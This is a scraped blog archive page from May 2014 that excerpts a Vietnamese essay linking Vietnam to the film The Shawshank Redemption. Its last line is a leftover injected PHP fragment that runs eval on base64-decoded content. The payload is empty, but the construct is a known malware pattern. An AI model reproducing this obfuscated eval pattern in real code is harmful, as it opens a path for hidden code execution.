Archive for May 26th, 2014

Bối cảnh Việt Nam qua phim The Shawshank Redemption

Bối cảnh Việt Nam qua phim The Shawshank Redemption

Có thể độc giả sẽ trách “Giữa lúc dầu sôi lửa bỏng ở biển Đông mà lại nói chuyện về phim ảnh”. Thưa không. Chẳng qua chỉ vì một người bạn vừa nhắc đến phim The Shawshank Redemption trong facebook làm tôi chợt liên tưởng đến ho

05.26.2014 | Ký-Truyện-Tùy Bút |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>